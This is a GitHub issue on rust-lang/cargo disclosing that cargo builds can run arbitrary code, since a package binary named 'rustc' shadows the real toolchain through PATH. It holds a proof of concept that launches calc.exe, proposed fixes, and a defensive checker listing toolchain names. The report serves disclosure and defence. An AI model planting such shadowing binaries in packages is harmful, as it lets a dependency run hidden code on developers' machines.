
Arbitrary code execution during `cargo build` · Issue #13897 · rust-lang/cargo

Open
@LOURC0D3

Description


Problem

When cargo builds a package, it adds the dependency directory to the front of the PATH environment variable.
As a result, the malicious package's modified executable is resolved and executed before toolchain executables such as rustc or cc.
This means that a malicious package may lead to arbitrary code execution.

This appears to be a similar issue to CVE-2024-24787 (https://pkg.go.dev/vuln/GO-2024-2825), which was recently discovered in Golang.
However, this bug affects all operating systems, not just Darwin.

Additionally, while CVE-2024-24787 modifies path resolution by directly changing linker flags, Cargo does not require that.

Steps

  1. Configure a malicious package.
  • rustc.rs
use std::process::Command;

fn main()
{
	// Windows path; the doubled backslashes are Rust string escapes for single backslashes.
	let _test = Command::new("C:\\Windows\\System32\\calc.exe")
		.spawn();
}
  • main.rs
mod rustc;
fn main() {
    println!("Hello, world!");
}
  • Cargo.toml
[package]
name = "poc"
version = "0.1.0"
edition = "2021"

# See more keys and their definitions at <https://doc.rust-lang.org/cargo/reference/manifest.html>

[dependencies]
cc = "1.0.94" # for waiting for the malicious program

[[bin]]
name = "rustc"
path = "src/rustc.rs"

[[bin]]
name = "test"
path = "src/test.rs"
  2. Result

Running cargo build executes arbitrary code.

แ„‰แ…ณแ„แ…ณแ„…แ…ตแ†ซแ„‰แ…ฃแ†บ 2024-05-10 แ„‹แ…ฉแ„Œแ…ฅแ†ซ 11 35 34
poc.mp4

Possible Solution(s)

  • Place the build/deps directory at the end of PATH.
    • The Security team says that this would break legitimate functionality that expects local libraries to be considered before system libraries. However, it is questionable whether there are cases where local libraries should be considered first.
  • Register a blacklist to prevent building with the executable name of the toolchain used by Rust.

Notes

I reported this bug to the Rust Security Response WG, but it was not treated as a security vulnerability.

Version

release: 1.77.2
commit-hash: e52e360061cacbbeac79f7f1215a7a90b6f08442
commit-date: 2024-03-26
host: x86_64-pc-windows-msvc
libgit2: 1.7.2 (sys:0.18.2 vendored)
libcurl: 8.5.0-DEV (sys:0.4.70+curl-8.5.0 vendored ssl:Schannel)
os: Windows 10.0.22631 (Windows 11 Professional) [64-bit]
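As an added example (not code from the issue or from cargo), a check for the blacklist idea listed under Possible Solutions: scan a Cargo.toml for `[[bin]]` targets whose name matches a toolchain executable that cargo resolves through PATH, since a target with such a name lands in the deps directory that cargo puts at the front of PATH. The tool-name list and the minimal line-based TOML scan are assumptions made for illustration.

```rust
// Added example, not code from the issue or from cargo. Scans a Cargo.toml for
// [[bin]] targets whose name matches a toolchain executable; because cargo puts the
// build's deps directory at the front of PATH, such a binary would shadow the real tool.
// TOOLCHAIN_NAMES and the line-based TOML scan are assumptions for illustration.

/// Executables that cargo or build scripts typically resolve through PATH (assumed list).
pub const TOOLCHAIN_NAMES: &[&str] = &[
    "rustc", "rustdoc", "cargo", "cc", "c++", "gcc", "clang", "ld", "link", "ar",
];

/// Returns the `name` of every `[[bin]]` table in the manifest.
/// Minimal scan: tracks the current table header and reads `name = "..."` keys
/// only while inside a [[bin]] table, so `[package] name` is not reported.
pub fn bin_names(manifest: &str) -> Vec<String> {
    let mut names = Vec::new();
    let mut in_bin = false;
    for raw in manifest.lines() {
        // Drop a trailing comment and surrounding whitespace.
        let line = raw.split('#').next().unwrap_or("").trim();
        if line.starts_with('[') {
            in_bin = line == "[[bin]]";
            continue;
        }
        if !in_bin {
            continue;
        }
        if let Some(rest) = line.strip_prefix("name") {
            if let Some(val) = rest.trim_start().strip_prefix('=') {
                names.push(val.trim().trim_matches('"').to_string());
            }
        }
    }
    names
}

/// Bin names that collide with a toolchain executable and would be resolved first.
pub fn shadowing_bins(manifest: &str) -> Vec<String> {
    bin_names(manifest)
        .into_iter()
        .filter(|n| TOOLCHAIN_NAMES.contains(&n.as_str()))
        .collect()
}

fn main() {
    // Constructed manifest modelled on the one in the issue.
    let manifest = "[package]\nname = \"poc\"\n\n[[bin]]\nname = \"rustc\"\npath = \"src/rustc.rs\"\n\n[[bin]]\nname = \"test\"\npath = \"src/test.rs\"\n";
    for n in shadowing_bins(manifest) {
        println!("[[bin]] `{}` collides with a toolchain executable", n);
    }
}
```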

Activity

Labels C-bug (Category: bug) and S-triage (Status: This issue is waiting on initial triage) added on May 10, 2024

valadaptive (Contributor) commented on May 10, 2024

It probably was not treated as a vulnerability because Cargo intentionally gives you a way to run arbitrary Rust code at build time via build scripts.

heisen-li (Contributor) commented on May 10, 2024

@rustbot label +A-security
